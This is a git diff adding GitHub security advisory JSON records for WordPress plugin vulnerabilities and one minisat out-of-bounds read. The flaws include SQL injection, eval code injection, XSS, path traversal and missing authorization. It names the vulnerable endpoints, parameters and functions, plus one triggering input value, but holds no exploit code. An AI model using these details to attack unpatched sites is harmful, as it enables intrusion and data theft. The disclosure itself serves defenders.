b/advisories/unreviewed/2026/02/GHSA-g6wj-gw42-4345/GHSA-g6wj-gw42-4345.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g6wj-gw42-4345", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1938" + ], + "details": "The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized license key deletion due to a missing authorization check on the `/yaymail-license/v1/license/delete` REST endpoint in versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to delete the plugin's license key via the '/yaymail-license/v1/license/delete' endpoint granted they can obtain the REST API nonce.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1938" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/src/License/RestAPI.php#L142" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/trunk/src/License/RestAPI.php#L142" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3460087" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6ce57b12-2241-416b-b466-aa06ca8c7551?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gch6-cfhh-c44p/GHSA-gch6-cfhh-c44p.json b/advisories/unreviewed/2026/02/GHSA-gch6-cfhh-c44p/GHSA-gch6-cfhh-c44p.json new file mode 100644 index 0000000000000..fd16389e309a2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gch6-cfhh-c44p/GHSA-gch6-cfhh-c44p.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gch6-cfhh-c44p", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2633" + ], + "details": "The Gutenberg Blocks with AI by Kadence WP plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.6.1. This is due to a missing capability check in the `process_image_data_ajax_callback()` function which handles the `kadence_import_process_image_data` AJAX action. The function's authorization check via `verify_ajax_call()` only validates `edit_posts` capability but fails to check for the `upload_files` capability. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary images from remote URLs to the WordPress Media Library, bypassing the standard WordPress capability restriction that prevents Contributors from uploading files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2633" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.5.32/includes/class-kadence-blocks-prebuilt-library.php#L1177" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.5.32/includes/class-kadence-blocks-prebuilt-library.php#L789" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3454881%40kadence-blocks%2Ftrunk&old=3453204%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9c06e0a9-a13a-4cee-a1a5-c43c114b2dbf?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gmgx-8hxg-f53q/GHSA-gmgx-8hxg-f53q.json b/advisories/unreviewed/2026/02/GHSA-gmgx-8hxg-f53q/GHSA-gmgx-8hxg-f53q.json new file mode 100644 index 0000000000000..5bafb011047c5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gmgx-8hxg-f53q/GHSA-gmgx-8hxg-f53q.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gmgx-8hxg-f53q", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1943" + ], + "details": "The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via settings in all versions up to, and including, 4.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Shop Manager-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1943" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/src/Controllers/TemplateController.php#L194" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/templates/elements/order-details.php#L123" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/templates/elements/text.php#L38" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3460087%40yaymail&new=3460087%40yaymail&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/73b4e5a2-bf75-4df9-a816-2cc858947c39?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gxvp-w433-832f/GHSA-gxvp-w433-832f.json b/advisories/unreviewed/2026/02/GHSA-gxvp-w433-832f/GHSA-gxvp-w433-832f.json new file mode 100644 index 0000000000000..0677cdb9d52e9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gxvp-w433-832f/GHSA-gxvp-w433-832f.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gxvp-w433-832f", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1831" + ], + "details": "The YayMail - WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized plugin installation and activation due to missing capability checks on the 'yaymail_install_yaysmtp' AJAX action and `/yaymail/v1/addons/activate` REST endpoint in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to install and activate the YaySMTP plugin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1831" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/src/Ajax.php#L183" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/src/Controllers/AddonController.php#L76" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/trunk/src/Ajax.php#L183" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3460087%40yaymail&new=3460087%40yaymail&sfp_email=&sfph_mail=#file11" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a568162a-5a2d-47ab-9dfe-2f2f5f324f0d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h92c-7ccr-x4hr/GHSA-h92c-7ccr-x4hr.json b/advisories/unreviewed/2026/02/GHSA-h92c-7ccr-x4hr/GHSA-h92c-7ccr-x4hr.json new file mode 100644 index 0000000000000..67544cd09a67d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h92c-7ccr-x4hr/GHSA-h92c-7ccr-x4hr.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h92c-7ccr-x4hr", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1860" + ], + "details": "The Kali Forms plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.4.8. This is due to the `get_items_permissions_check()` permission callback on the `/kaliforms/v1/forms/{id}` REST API endpoint only checking for the `edit_posts` capability without verifying that the requesting user has ownership or authorization over the specific form resource. This makes it possible for authenticated attackers, with Contributor-level access and above, to read form configuration data belonging to other users (including administrators) by enumerating form IDs. Exposed data includes form field structures, Google reCAPTCHA secret keys (if configured), email notification templates, and server paths.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1860" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kali-forms/tags/2.4.8/Inc/Backend/Rest/class-forms-rest-controller.php#L116" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kali-forms/tags/2.4.8/Inc/Backend/Rest/class-forms-rest-controller.php#L251" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kali-forms/tags/2.4.8/Inc/Backend/Rest/class-forms-rest-controller.php#L62" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3460047/kali-forms/trunk?contextall=1&old=3435823&old_path=%2Fkali-forms%2Ftrunk" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a1529c89-5c5e-4a2d-be31-b55d2907c9b6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jh7f-pj8r-h37c/GHSA-jh7f-pj8r-h37c.json b/advisories/unreviewed/2026/02/GHSA-jh7f-pj8r-h37c/GHSA-jh7f-pj8r-h37c.json new file mode 100644 index 0000000000000..529876aa4f7e3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jh7f-pj8r-h37c/GHSA-jh7f-pj8r-h37c.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jh7f-pj8r-h37c", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1655" + ], + "details": "The EventPrime plugin for WordPress is vulnerable to unauthorized post modification due to missing authorization checks in all versions up to, and including, 4.2.8.4. This is due to the save_frontend_event_submission function accepting a user-controlled event_id parameter and updating the corresponding event post without enforcing ownership or capability checks. This makes it possible for authenticated (Customer+) attackers to modify posts created by administrators by manipulating the event_id parameter granted they can obtain a valid nonce.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1655" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/tags/4.2.8.1/includes/class-ep-ajax.php#L741" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/tags/4.2.8.1/includes/class-ep-ajax.php#L798" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk/includes/class-ep-ajax.php#L741" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk/includes/class-ep-ajax.php#L798" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3455239%40eventprime-event-calendar-management%2Ftrunk&old=3452796%40eventprime-event-calendar-management%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0e2a2769-1309-4aad-8411-4445efea2b66?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json b/advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json new file mode 100644 index 0000000000000..0a3cb7dbead1e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p572-g32f-hp32", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2296" + ], + "details": "The Product Addons for Woocommerce – Product Options with Custom Fields plugin for WordPress is vulnerable to Code Injection in all versions up to, and including, 3.1.0. This is due to insufficient input validation of the 'operator' field in conditional logic rules within the evalConditions() function, which passes unsanitized user input directly to PHP's eval() function. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject and execute arbitrary PHP code on the server via the conditional logic 'operator' parameter when saving addon form field rules.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2296" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/tags/3.0.19/includes/process/conditional-logic.php#L104" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/tags/3.0.19/includes/process/conditional-logic.php#L84" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/trunk/includes/process/conditional-logic.php#L104" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-custom-product-addons/trunk/includes/process/conditional-logic.php#L84" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3458823%40woo-custom-product-addons&new=3458823%40woo-custom-product-addons&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c1edd7-2421-4dfa-8775-ca0497759d52?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json b/advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json new file mode 100644 index 0000000000000..454dd1a293821 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q7cc-x725-hp7g", + "modified": "2026-02-18T09:31:03Z", + "published": "2026-02-18T09:31:03Z", + "aliases": [ + "CVE-2026-1807" + ], + "details": "The InteractiveCalculator for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'interactivecalculator' shortcode in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1807" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/interactivecalculator/tags/1.0.1/interactivecalculator.php#L44" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3456849%40interactivecalculator&new=3456849%40interactivecalculator&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3456870%40interactivecalculator&new=3456870%40interactivecalculator&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5c38f080-59c7-4201-9e87-87ee9ab6b97b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json b/advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json new file mode 100644 index 0000000000000..0c1f57574dbb5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q7wp-4j7p-g4vj", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2419" + ], + "details": "The WP-DownloadManager plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.69 via the 'download_path' configuration parameter. This is due to insufficient validation of the download path setting, which allows directory traversal sequences to bypass the WP_CONTENT_DIR prefix check. This makes it possible for authenticated attackers, with Administrator-level access and above, to configure the plugin to list and access arbitrary files on the server by exploiting the file browser functionality.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2419" + }, + { + "type": "WEB", + "url": "https://github.com/lesterchan/wp-downloadmanager/commit/416b9f5459496166c0395f9e055d4c4cf872404a" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/tags/1.69/download-options.php#L42" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/trunk/download-options.php#L42" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0bb96da1-9c17-4264-ac29-b5ff8dec745d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json b/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json new file mode 100644 index 0000000000000..8b16527cca469 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qfwf-756h-2p4g", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2644" + ], + "details": "A weakness has been identified in niklasso minisat up to 2.2.0. This issue affects the function Solver::value in the library core/SolverTypes.h of the component DIMACS File Parser. This manipulation of the argument variable index with the input 2147483648 causes out-of-bounds read. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2644" + }, + { + "type": "WEB", + "url": "https://github.com/niklasso/minisat/issues/55" + }, + { + "type": "WEB", + "url": "https://github.com/niklasso/minisat/issues/55#issue-3832527387" + }, + { + "type": "WEB", + "url": "https://github.com/niklasso/minisat" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346406" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346406" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752775" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json b/advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json new file mode 100644 index 0000000000000..7321ce7053113 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qj9g-q4j9-47hp", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2112" + ], + "details": "The Dam Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.8. This is due to missing nonce verification on the pending comment deletion action in the cleanup page. This makes it possible for unauthenticated attackers to delete all pending comments via a forged request granted they can trick an admin into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2112" + }, + { + "type": "WEB", + "url": "https://github.com/webguyio/dam-spam/blob/52e12fb455e7b670af2e0713f9da84d2d1d309ac/settings/cleanup.php#L92" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/dam-spam/tags/1.0.6/settings/cleanup.php#L92" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/dam-spam/trunk/settings/cleanup.php#L92" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3457369%40dam-spam&new=3457369%40dam-spam&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e336dc27-4a76-4197-929c-b221f42bfe69?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json b/advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json new file mode 100644 index 0000000000000..1ce5960d7bf73 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rg7x-c263-823c", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2495" + ], + "details": "The WPNakama – Team and multi-Client Collaboration, Editorial and Project Management plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the '/wp-json/WPNakama/v1/boards' REST API endpoint in all versions up to, and including, 0.6.5. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2495" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpnakama/tags/0.6.5/inc/class-wpnakama-api.php#L209" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpnakama/tags/0.6.5/inc/class-wpnakama.php#L215" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpnakama/trunk/inc/class-wpnakama-api.php#L209" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpnakama/trunk/inc/class-wpnakama.php#L215" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3461315%40wpnakama&new=3461315%40wpnakama&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7ffa92be-9d38-40d9-954d-d890136b5aa1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T09:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json b/advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json new file mode 100644 index 0000000000000..2364f3a755ee7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxhm-86c2-x66c", + "modified": "2026-02-18T09:31:03Z", + "published": "2026-02-18T09:31:03Z", + "aliases": [ + "CVE-2026-1640" + ], + "details": "The Taskbuilder – WordPress Project Management & Task Management plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 5.0.2. This is due to missing authorization checks on the project and task comment submission functions (AJAX actions: wppm_submit_proj_comment and wppm_submit_task_comment). This makes it possible for authenticated attackers, with subscriber-level access and above, to create comments on any project or task (including private projects they cannot view or are not assigned to), and inject arbitrary HTML and CSS via the insufficiently sanitized comment_body parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1640" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/projects/open_project/wppm_submit_project_comment.php#L6" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/tasks/open_task/wppm_submit_task_comment.php#L6" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/66095908-875f-486d-ae77-6015671872de?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json b/advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json new file mode 100644 index 0000000000000..be96604f860ee --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xf7v-j2cc-2crf", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1941" + ], + "details": "The WP Event Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_events' shortcode in all versions up to, and including, 1.8.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, 